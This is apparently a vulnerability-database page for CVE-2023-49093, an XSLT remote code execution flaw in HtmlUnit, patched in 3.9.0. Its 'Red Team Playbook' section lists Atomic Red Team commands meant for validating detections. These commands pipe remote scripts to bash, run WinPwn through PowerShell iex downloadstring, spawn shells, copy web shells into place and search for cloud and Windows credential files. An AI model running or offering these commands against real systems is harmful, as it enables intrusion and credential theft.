CVE-2023-49093
Overview
The vulnerability is a remote code execution (RCE) flaw rooted in unsafe processing of XSLT (Extensible Stylesheet Language Transformations) within the HtmlUnit Java library. Specifically, the XSLT engine improperly handles external stylesheet inputs when rendering attacker-controlled web content. This flaw affects the core HTML parsing and scripting components responsible for simulating browser behavior without a GUI.
Vulnerability Description
HtmlUnit is a GUI-less browser for Java programs. HtmlUnit is vulnerable to Remote Code Execution (RCE) via XSTL, when browsing the attacker’s webpage. This vulnerability has been patched in version 3.9.0
Impact
An unauthenticated attacker can remotely execute arbitrary code on systems running vulnerable HtmlUnit versions by luring the application to load a malicious webpage containing crafted XSLT payloads. This requires only network access and no user interaction, as the flaw is exploitable during automated browsing or web scraping tasks. Successful exploitation can lead to complete system compromise, data exfiltration, or service disruption. The CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms that no privileges or user interaction are needed for exploitation.
Solution
Upgrade HtmlUnit to version 3.9.0 or later, where the XSLT processing vulnerability has been patched. Refer to the HtmlUnit security advisory GHSA-37vq-hr2f-g7h7 and the official changelog at https://www.htmlunit.org/changes-report.html#a3.9.0 for detailed patch information and instructions. No alternative workarounds are recommended; applying the update is the definitive remediation step.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
HtmlUnit, a widely used GUI-less browser for Java applications, has been identified with a critical vulnerability that allows for Remote Code Execution (RCE) through the exploitation of XSLT when users navigate to a malicious webpage. This vulnerability arises from improper handling of XSLT transformations, which can be manipulated by an attacker to execute arbitrary code on the server or client-side, depending on the context in which HtmlUnit is deployed. The flaw is particularly concerning due to the nature of HtmlUnit's functionality, which is often utilized in automated testing environments and web scraping applications, making it a potential target for attackers seeking to exploit its capabilities.
The primary attack vector involves tricking a user or an automated process into visiting a malicious webpage that contains crafted XSLT content. Upon loading this content, the vulnerability can be triggered, leading to the execution of arbitrary code on the machine running HtmlUnit. This could occur in various scenarios, such as during automated testing processes where HtmlUnit is used to simulate user interactions or in backend services that utilize HtmlUnit for web scraping. Attackers could leverage this vulnerability to gain unauthorized access to sensitive data, manipulate application behavior, or even pivot to other systems within the network.
The real-world impact of this vulnerability can be significant, particularly for organizations that rely on HtmlUnit for critical operations. The potential for RCE means that an attacker could gain full control over the affected system, leading to data breaches, service disruptions, and significant financial losses. Moreover, the exploitation of this vulnerability could result in reputational damage, regulatory penalties, and loss of customer trust, especially if sensitive information is compromised. Businesses that utilize HtmlUnit in their development or testing environments must recognize the elevated risk posed by this vulnerability and take proactive measures to safeguard their systems.
To detect and mitigate the risks associated with this vulnerability, organizations should prioritize updating HtmlUnit to the patched version, which addresses the RCE issue. Regularly monitoring and applying security updates is crucial in maintaining a secure environment. Additionally, implementing web application firewalls (WAFs) can help filter out malicious requests that attempt to exploit this vulnerability. Organizations should also conduct thorough security assessments and penetration testing to identify any potential weaknesses in their use of HtmlUnit and ensure that their configurations are secure against such attacks.
In conclusion, the vulnerability present in HtmlUnit poses a serious threat to organizations that utilize this tool for web automation and testing. The ability for an attacker to execute arbitrary code through XSLT manipulation highlights the need for vigilant security practices, including timely updates, robust detection mechanisms, and comprehensive risk assessments. By understanding the nature of this vulnerability and implementing appropriate mitigation strategies, organizations can better protect themselves against potential exploitation and the associated business risks.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Htmlunit | Htmlunit | All |
cpe:2.3:a:htmlunit:htmlunit:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-49093 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/HtmlUnit/htmlunit/security/advisories/GHSA-37vq-hr2f-g7h7 |
| htmlunit.org |
GitHub CVE
x_refsource_MISC
|
https://www.htmlunit.org/changes-report.html#a3.9.0 |